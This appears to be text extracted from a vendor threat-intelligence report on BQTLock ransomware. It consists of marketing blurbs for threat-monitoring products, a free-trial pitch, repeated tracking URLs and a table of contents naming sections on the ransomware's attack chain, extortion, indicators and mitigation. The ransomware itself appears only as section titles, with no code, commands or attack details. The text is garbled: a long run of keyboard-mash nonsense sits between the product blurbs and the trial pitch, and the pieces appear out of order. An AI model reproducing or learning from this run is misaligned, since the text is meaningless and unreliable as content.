insights into financially-targeted APT groups and the threat landscape. Protecting Customers’ PII: Scan millions of data points on the surface, deep and Dark Web to accurately identify the leakage of your customers' Personally Identifiable Information (PII) in compliance with regulations. Credit Card Monitoring: Enhance your fraud detection mechanisms with automation speed by identifying stolen credit card data on popular global black markets, carding forums, social channels, and chatters. 360-Degree Visibility: Achieve digital resilience by maintaining internet-facing digital asset inventory. Significantly accelerate this process by automated discovery, mapping, and continuous asset monitoring. aasakjaofjaskfkajdfjkadkjfsjkdfkjsssxsxasaxasaxaxzxalkxaskxaskxaskxksakxsakxansxnksanxkanksxknasknxaknsxkansxnk ansxnaksxnasknxansxnkasnxxasnkaxsnknaksxnkasknxnkasxnkaknsxknankxnkaxnkaxknaknaxnnkaxkanaxadcdcdscksdcd ccddcdcndcdcdcdcdcdcdcdcdcdccddcdcdcfdecjwekfvnedfkjvnfkjenvkjfnvkjdfnvjkdnfvnjdfnvjdfnjvjnkdfvnjdfvnjx START YOUR FREE TRIAL Discover SOCRadar’s powerful tools and easy-to-use interface to enhance cyber threat intelligence efforts. Schedule a demo with our experts to see it in action, and we’ll show you what SOCRadar can do. 97 https://socradar.io/products/extended-threat-intelligence/?utm_campaign=16185902-GatedContent_Country-Reports_Global_0725&utm_source=website&utm_medium=whitepapers&utm_term=ExtendedThreatIntelligence&utm_content=FormSubmissions https://socradar.io/products/extended-threat-intelligence/?utm_campaign=16185902-GatedContent_Country-Reports_Global_0725&utm_source=website&utm_medium=whitepapers&utm_term=ExtendedThreatIntelligence&utm_content=FormSubmissions https://socradar.io/products/extended-threat-intelligence/?utm_campaign=16185902-GatedContent_Country-Reports_Global_0725&utm_source=website&utm_medium=whitepapers&utm_term=ExtendedThreatIntelligence&utm_content=FormSubmissions https://socradar.io/use-for-free/?utm_campaign=16185902-GatedContent_Country-Reports_Global_0725&utm_source=website&utm_medium=whitepapers&utm_term=FreeAccess&utm_content=FormSubmissions https://socradar.io/use-for-free/?utm_campaign=CountryIndustryReport&utm_source=Report&utm_medium=northamerica25&utm_term=FreeAccess&utm_content=FormSubmissions https://socradar.io/use-for-free/?utm_campaign=CountryIndustryReport&utm_source=Report&utm_medium=northamerica25&utm_term=FreeAccess&utm_content=FormSubmissions https://socradar.io/use-for-free/?utm_campaign=CountryIndustryReport&utm_source=Report&utm_medium=northamerica25&utm_term=FreeAccess&utm_content=FormSubmissions BQTLock Ransomware Who is BQTLock Ransomware? Victimology Confirmed Victims Target Industries Target Countries Modus Operandi Decryption Waves & Estimated Gains Pricing & Affiliates Technical Details Binary Information DLLs Decryptor Ransomware & Versions Attack Chain Initial Access Execution Reconnaissance Privilege Escalation Command and Control (C2) Impact Builder Special Features Extortion Methods ​Double and Triple Extortion ​Pressure Warfare & Psychological Tactics Threat Intelligence Implications ​Insights Into the Future of RaaS based on BQTLOCK ​Trends: Hybrid Groups ​Recommendations ​Detection Response & Mitigation Preventive Mitigation Further Intelligence Feed ​Panel Telegram & Discord Conclusion MITRE ATT&CK TTPs IOCs External Resources